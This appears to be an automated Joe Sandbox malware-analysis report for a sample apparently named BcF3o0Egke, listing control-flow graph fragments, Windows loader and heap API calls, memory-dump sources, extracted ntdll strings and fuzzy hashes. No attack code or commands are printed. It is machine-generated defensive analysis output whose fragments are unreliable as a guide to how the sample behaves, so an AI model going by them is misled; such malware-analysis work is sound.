                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 7046-nn1K$7046-nn1K
                                                                    • API String ID: 0-59622768

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_BcF3o0Egke.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 258 15c2c0a-15c2c0f 259 15c2c1f-15c2c26 LdrInitializeThunk 258->259 260 15c2c11-15c2c18 258->260
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    Strings
                                                                    • Invalid debug info address of this critical section, xrefs: 015F54B6
                                                                    • 8, xrefs: 015F52E3
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F54E2
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F540A, 015F5496, 015F5519
                                                                    • corrupted critical section, xrefs: 015F54C2
                                                                    • Critical section debug info address, xrefs: 015F541F, 015F552E
                                                                    • Address of the debug info found in the active list., xrefs: 015F54AE, 015F54FA
                                                                    • Critical section address, xrefs: 015F5425, 015F54BC, 015F5534
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 015F5543
                                                                    • Thread identifier, xrefs: 015F553A
                                                                    • Critical section address., xrefs: 015F5502
                                                                    • undeleted critical section in freed memory, xrefs: 015F542B
                                                                    • double initialized or corrupted critical section, xrefs: 015F5508
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015F54CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    • API String ID: 0-2368682639
                                                                    Strings
                                                                    • @, xrefs: 015F259B
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015F22E4
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015F2624
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015F24C0
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015F2412
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015F25EB
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015F2602
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 015F261F
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015F2498
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015F2409
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015F2506
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    • API String ID: 0-4009184096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    Strings
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01608A3D
                                                                    • HandleTraces, xrefs: 01608C8F
                                                                    • VerifierDebug, xrefs: 01608CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01608A67
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01608B8F
                                                                    • VerifierDlls, xrefs: 01608CBD
                                                                    • VerifierFlags, xrefs: 01608C50
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    • API String ID: 0-3223716464
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • LdrpInitShimEngine, xrefs: 015D99F4, 015D9A07, 015D9A30
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015D9A2A
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015D99ED
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015D9A11, 015D9A3A
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015D9A01
                                                                    • apphelp.dll, xrefs: 01576496
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015F2178
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015F2180
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015F21BF
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015F2165
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 015F2160, 015F219A, 015F21BA
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015F219F
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    Strings
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 015F8170
                                                                    • LdrpInitializeImportRedirection, xrefs: 015F8177, 015F81EB
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015BC6C3
                                                                    • LdrpInitializeProcess, xrefs: 015BC6C4
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 015F8181, 015F81F5
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015F81E5
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    APIs
                                                                      • Part of subcall function 015C2DF0: LdrInitializeThunk.NTDLL ref: 015C2DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015C0D74
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    Strings
                                                                    • @, xrefs: 015B8591
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015B8421
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015B855E
                                                                    • LdrpInitializeProcess, xrefs: 015B8422
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015F22B6
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015F21D9, 015F22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015F21DE
                                                                    • .Local, xrefs: 015B28D8
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    Strings
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015F342A
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015F3437
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015F3456
                                                                    • RtlDeactivateActivationContext, xrefs: 015F3425, 015F3432, 015F3451
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015E106B
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015E10AE
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015E0FE5
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015E1028
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    Strings
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015EA992
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015EA9A2
                                                                    • LdrpDynamicShimModule, xrefs: 015EA998
                                                                    • apphelp.dll, xrefs: 015A2462
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 01593255
                                                                    • HEAP: , xrefs: 01593264
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0159327D
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    Strings
                                                                    • LdrpCheckModule, xrefs: 015EA117
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015EA121
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 015EA10F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015F82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015F82DE
                                                                    • Failed to reallocate the system dirs string !, xrefs: 015F82D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • PreferredUILanguages, xrefs: 0163C212
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0163C1C5
                                                                    • @, xrefs: 0163C1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    Strings
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01604888
                                                                    • LdrpCheckRedirection, xrefs: 0160488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01604899
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    Strings
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 016020F3
                                                                    • LdrpInitializationFailure, xrefs: 016020FA
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01602104
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    Strings
                                                                    • LdrResSearchResource Enter, xrefs: 0158AA13
                                                                    • LdrResSearchResource Exit, xrefs: 0158AA25
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    Strings
                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0158063D
                                                                    • kLsE, xrefs: 01580540
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0158A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0158A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Cleanup Group$Threadpool!
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: a33e989764b9a047e60f923bed4262a6878177281cbbaaec235b9e8443393693
                                                                    • Instruction ID: c00248d398533bf3942ac9a197d3de5c8bf38cd09ece8995d9f2c2796a068c2a
                                                                    • Opcode Fuzzy Hash: a33e989764b9a047e60f923bed4262a6878177281cbbaaec235b9e8443393693
                                                                    • Instruction Fuzzy Hash: E191AF31901A1AAEDF22AFA5DC44FEFBB79FF85740F100029F505AB250E7769902CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GlobalTags
                                                                    • API String ID: 0-1106856819
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .mui
                                                                    • API String ID: 0-1199573805
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: EXT-
                                                                    • API String ID: 0-1948896318
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    Strings
                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0160895E
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                    • API String ID: 0-702105204
                                                                    • Instruction Fuzzy Hash: 97A1AE74A00A16DFDB25DFA9C890BAEB7A5FF54B18F10442DFA059F281DB34E811CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9da807051bad6a23405144b2936ab65f9f95e30a8109dc90eaf09a3751ff2d27
                                                                    • Instruction ID: 5259ee6dab34133c3f6b409cf6329b33322a2c1a46c6c51b72b0a4d172e84a8d
                                                                    • Opcode Fuzzy Hash: 9da807051bad6a23405144b2936ab65f9f95e30a8109dc90eaf09a3751ff2d27
                                                                    • Instruction Fuzzy Hash: 2DA1EF72604612EFCB55DF28CD80B6ABBE8FF88704F050568E949DB750EB30E981CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4579ed0380335a93997809e371f2d9cae2e99d9ccbe1fc542cbd1d9014be312
